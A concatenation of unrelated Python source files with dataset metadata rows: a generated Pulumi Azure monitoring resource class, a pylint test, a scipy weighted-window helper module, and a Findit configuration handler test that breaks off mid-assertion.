tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
        Manages a Monitor Action Rule whose type is action group.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_group = azure.monitoring.ActionGroup("exampleActionGroup",
resource_group_name=example_resource_group.name,
short_name="exampleactiongroup")
example_action_rule_action_group = azure.monitoring.ActionRuleActionGroup("exampleActionRuleActionGroup",
resource_group_name=example_resource_group.name,
action_group_id=example_action_group.id,
scope=azure.monitoring.ActionRuleActionGroupScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionRuleActionGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        Manages a Monitor Action Rule whose type is action group.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_group = azure.monitoring.ActionGroup("exampleActionGroup",
resource_group_name=example_resource_group.name,
short_name="exampleactiongroup")
example_action_rule_action_group = azure.monitoring.ActionRuleActionGroup("exampleActionRuleActionGroup",
resource_group_name=example_resource_group.name,
action_group_id=example_action_group.id,
scope=azure.monitoring.ActionRuleActionGroupScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param ActionRuleActionGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionRuleActionGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionRuleActionGroupArgs.__new__(ActionRuleActionGroupArgs)
if action_group_id is None and not opts.urn:
raise TypeError("Missing required property 'action_group_id'")
__props__.__dict__["action_group_id"] = action_group_id
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["tags"] = tags
super(ActionRuleActionGroup, __self__).__init__(
'azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ActionRuleActionGroup':
"""
Get an existing ActionRuleActionGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionRuleActionGroupState.__new__(_ActionRuleActionGroupState)
__props__.__dict__["action_group_id"] = action_group_id
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["tags"] = tags
return ActionRuleActionGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> pulumi.Output[str]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.ActionRuleActionGroupCondition']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def scope(self) -> pulumi.Output[Optional['outputs.ActionRuleActionGroupScope']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 44.443623 | 228 | 0.655257 | 2,680 | 24,044 | 5.686194 | 0.071269 | 0.087342 | 0.061553 | 0.04331 | 0.87427 | 0.85793 | 0.839885 | 0.831223 | 0.827876 | 0.822232 | 0 | 0.003795 | 0.243803 | 24,044 | 540 | 229 | 44.525926 | 0.834342 | 0.344826 | 0 | 0.774744 | 1 | 0 | 0.12373 | 0.055393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16041 | false | 0.003413 | 0.023891 | 0 | 0.279863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
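The generated docstrings above already show resource creation; as a complement, here is a small sketch of adopting an existing rule through the `get` method defined above. The subscription and rule names are the placeholders from the file's own import example:

```python
import pulumi
import pulumi_azure as azure

# Adopt an already-provisioned action rule by its provider ID.
existing = azure.monitoring.ActionRuleActionGroup.get(
    "example-imported",
    id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/"
       "group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1")
pulumi.export("actionGroupId", existing.action_group_id)
```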
d7d3f50d323e899f44dc7d0e927709eabb4896d2 | 158 | py | Python | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 2 | 2019-03-07T15:43:49.000Z | 2019-03-14T06:33:31.000Z | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 22 | 2018-11-07T22:52:57.000Z | 2021-03-20T00:18:31.000Z | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 3 | 2018-10-08T02:03:59.000Z | 2019-04-23T17:28:55.000Z | """Code quality tests for KAOS."""
def test_code_quality():
"""Pylint test."""
from pylint import epylint as lint
assert not lint.py_run("kaos")
| 22.571429 | 38 | 0.664557 | 23 | 158 | 4.434783 | 0.73913 | 0.215686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196203 | 158 | 6 | 39 | 26.333333 | 0.80315 | 0.259494 | 0 | 0 | 0 | 0 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
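`pylint.epylint` was deprecated and later removed in newer pylint releases, so an equivalent gate through the maintained entry point may age better; a sketch assuming a pylint 2.x-era `Run(..., exit=False)` signature:

```python
def test_code_quality_via_run():
    """Sketch of the same gate without the deprecated epylint wrapper."""
    from pylint.lint import Run
    result = Run(["kaos"], exit=False)
    assert result.linter.msg_status == 0  # non-zero once messages are emitted
```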
f098fc29cff9a39ad8aa19535a116df4a10ccd60 | 8,544 | py | Python | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | NITRO-AI/NitroFE | 08d5ccd2be7da4534bd1fb04b85d7c61ba1c017e | [
"Apache-2.0"
] | 81 | 2021-10-31T12:20:10.000Z | 2022-03-29T22:38:06.000Z | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | adbmd/NitroFE | 327a54ffd5f9aaa19d05d7d87918757e3b0f5712 | [
"Apache-2.0"
] | 1 | 2021-11-02T14:21:48.000Z | 2021-11-02T14:21:48.000Z | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | adbmd/NitroFE | 327a54ffd5f9aaa19d05d7d87918757e3b0f5712 | [
"Apache-2.0"
] | 7 | 2021-11-01T08:17:37.000Z | 2022-01-01T19:06:06.000Z | from scipy import signal
import numpy as np
def _weighted_window_operation(data,
window_size,
window_function_values,
                               resize=True):
    """Multiply `data` elementwise by `window_function_values`; when `data`
    is shorter than the window and `resize` is set, `data` is left-padded
    with zeros, otherwise the weights are truncated to the data length."""
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
else:
window_function_values=window_function_values[:len(data)]
return np.multiply(window_function_values, data)
def _barthann_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.barthann(window_size, sym=symmetric)
else:
window_function_values=signal.windows.barthann(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _weighted_moving_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=np.arange(1,window_size+1)/np.arange(1,window_size+1).sum()
else:
window_function_values=np.arange(1,len(data)+1)/np.arange(1,len(data)+1).sum()
return np.multiply(window_function_values, data)
def _bartlett_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.bartlett(window_size, sym=symmetric)
else:
window_function_values=signal.windows.bartlett(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _blackman_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.blackman(window_size, sym=symmetric)
else:
window_function_values=signal.windows.blackman(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _blackmanharris_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.blackmanharris(window_size, sym=symmetric)
else:
window_function_values=signal.windows.blackmanharris(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _bohman_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.bohman(window_size, sym=symmetric)
else:
window_function_values=signal.windows.bohman(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _cosine_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.cosine(window_size, sym=symmetric)
else:
window_function_values=signal.windows.cosine(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _exponential_window(data,
window_size,
center,
tau,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.exponential(window_size, center=center,
tau=tau, sym=symmetric)
else:
window_function_values=signal.windows.exponential(len(data), center=center,
tau=tau, sym=symmetric)
return np.multiply(window_function_values, data)
def _flattop_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.flattop(window_size, sym=symmetric)
else:
window_function_values=signal.windows.flattop(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _gaussian_window(data,
window_size,
std,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.gaussian(window_size, std=std,sym=symmetric)
else:
window_function_values=signal.windows.gaussian(len(data), std=std,sym=symmetric)
return np.multiply(window_function_values, data)
def _hamming_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.hamming(window_size, sym=symmetric)
else:
window_function_values=signal.windows.hamming(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _hann_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
        window_function_values=signal.windows.hann(window_size, sym=symmetric)
    else:
        window_function_values=signal.windows.hann(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _kaiser_window(data,
window_size,
beta,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.kaiser(window_size, beta,sym=symmetric)
else:
window_function_values=signal.windows.kaiser(len(data), beta,sym=symmetric)
return np.multiply(window_function_values, data)
def _parzen_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.parzen(window_size,sym=symmetric)
else:
window_function_values=signal.windows.parzen(len(data),sym=symmetric)
return np.multiply(window_function_values, data)
def _triang_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.triang(window_size,sym=symmetric)
else:
window_function_values=signal.windows.triang(len(data),sym=symmetric)
return np.multiply(window_function_values, data)
def _equal_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=np.ones(window_size)
else:
window_function_values=np.ones(len(data))
return np.multiply(window_function_values, data)
def _identity_window(data,
window_size,
symmetric,
resize=False):
    # Intentionally a no-op; the unused parameters keep the signature uniform
    # with the other window helpers so callers can dispatch on one interface.
    return data
| 38.660633 | 91 | 0.602762 | 936 | 8,544 | 5.276709 | 0.056624 | 0.139704 | 0.210569 | 0.147398 | 0.907876 | 0.900182 | 0.836202 | 0.828103 | 0.789634 | 0.789634 | 0 | 0.001327 | 0.294593 | 8,544 | 220 | 92 | 38.836364 | 0.818152 | 0 | 0 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098901 | false | 0 | 0.010989 | 0.005495 | 0.208791 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
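Each helper above multiplies the series by a scipy window of matching length; a short usage sketch mirroring `_hamming_window`, with an arbitrary series and window length:

```python
import numpy as np
from scipy import signal

data = np.arange(8, dtype=float)  # arbitrary series
weights = signal.windows.hamming(len(data), sym=True)
print(np.multiply(weights, data).round(3))
# equivalent to _hamming_window(data, window_size=8, symmetric=True)
```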
f0cbcdee7e0b8f614715551fe2febb68f668f1b7 | 38,395 | py | Python | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import re
import webapp2
import webtest
from handlers import config
from model import wf_config
from testing_utils import testing
from google.appengine.api import users
_MOCK_STEPS_FOR_MASTERS_RULES_OLD_FORMAT = {
'master1': ['unsupported_step1', 'unsupported_step2'],
'master2': ['unsupported_step3', 'unsupported_step4'],
}
_MOCK_STEPS_FOR_MASTERS_RULES = {
'supported_masters': {
'master1': {
# supported_steps override global.
'supported_steps': ['step6'],
'unsupported_steps': ['step1', 'step2', 'step3'],
'check_global': True
},
'master2': {
# Only supports step4 and step5 regardless of global.
'supported_steps': ['step4', 'step5'],
'check_global': False
},
'master3': {
# Supports everything not blacklisted in global.
'check_global': True
},
},
'global': {
# Blacklists all listed steps for all masters unless overridden.
'unsupported_steps': ['step6', 'step7'],
}
}
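# Illustrative helper, not part of the original test module: one way the
# rules above could resolve for a (master, step) pair, reconstructed from
# the inline comments.  Findit's real implementation may differ.
def _is_step_supported(rules, master, step):
  master_rules = rules['supported_masters'].get(master)
  if master_rules is None:
    return False
  if step in master_rules.get('supported_steps', []):
    return True
  if step in master_rules.get('unsupported_steps', []):
    return False
  if not master_rules.get('check_global', True):
    return False
  return step not in rules['global'].get('unsupported_steps', [])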
_MOCK_BUILDERS_TO_TRYBOTS = {
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 'trybot1_flake'
}
}
}
_MOCK_TRY_JOB_SETTINGS = {
'server_query_interval_seconds': 60,
'job_timeout_hours': 5,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}
_MOCK_SWARMING_SETTINGS = {
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 5 * 60, # 5 minutes.
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 2,
'maximum_server_contact_retry_interval_seconds': 5 * 60, # 5 minutes.
'should_retry_server': False, # No retry for unit testing.
}
_MOCK_DOWNLOAD_BUILD_DATA_SETTINGS = {
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': True
}
_MOCK_ACTION_SETTINGS = {
'cr_notification_build_threshold': 2,
'cr_notification_latency_limit_minutes': 1000,
}
_MOCK_CHECK_FLAKE_SETTINGS = {
'swarming_rerun': {
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'max_dive_in_a_row': 4,
'dive_rate_threshold': 0.4,
'use_nearby_neighbor': True,
},
'try_job_rerun': {
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 0,
'max_stable_in_a_row': 0,
'iterations_to_rerun': 100,
},
'update_monorail_bug': True,
'minimum_confidence_score_to_run_tryjobs': 0.6
}
_MOCK_VERSION_NUMBER = 12
class ConfigTest(testing.AppengineTestCase):
app_module = webapp2.WSGIApplication([
('/config', config.Configuration),
], debug=True)
def testGetConfigurationSettings(self):
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
}
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
response = self.test_app.get('/config', params={'format': 'json'})
self.assertEquals(response.status_int, 200)
expected_response = {
'masters': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEquals(expected_response, response.json_body)
def testGetVersionOfConfigurationSettings(self):
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
}
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
response = self.test_app.get(
'/config', params={'version': 1, 'format': 'json'})
self.assertEquals(response.status_int, 200)
expected_response = {
'masters': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEquals(expected_response, response.json_body)
def testGetOutOfBoundsVersionOfConfigurationSettings(self):
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS
}
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
self.assertRaisesRegexp(
webtest.app.AppError,
re.compile('The requested version is invalid or not found.',
re.MULTILINE | re.DOTALL),
self.test_app.get, '/config', params={'version': 0, 'format': 'json'})
self.assertRaisesRegexp(
webtest.app.AppError,
re.compile('The requested version is invalid or not found.',
re.MULTILINE | re.DOTALL),
self.test_app.get, '/config', params={'version': 2, 'format': 'json'})
def testIsListOfType(self):
self.assertFalse(config._IsListOfType({}, basestring))
self.assertFalse(config._IsListOfType([], basestring))
self.assertFalse(config._IsListOfType([1], basestring))
self.assertFalse(config._IsListOfType(['a', 1], basestring))
self.assertTrue(config._IsListOfType(['a', 'b'], basestring))
def testValidateSupportedMastersDict(self):
self.assertFalse(config._ValidateMastersAndStepsRulesMapping(
_MOCK_STEPS_FOR_MASTERS_RULES_OLD_FORMAT))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping(None))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping([]))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': [], # Should be a dict.
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
# 'global' is missing.
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
'global': [] # Should be a dict.
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
3: {}, # Key should be a string.
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': [], # Value should be a dict.
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'check_global': 1 # Should be a bool.
},
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {},
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': {}, # Should be a list.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': [], # List should not be empty.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': [1], # List should be of strings.
}
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': 'blabla', # Should be a list.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': [], # List should not be empty.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': [{}], # List should be of strings.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': ['step1'], # Should not overlap.
}
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': 1 # Should be a list.
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
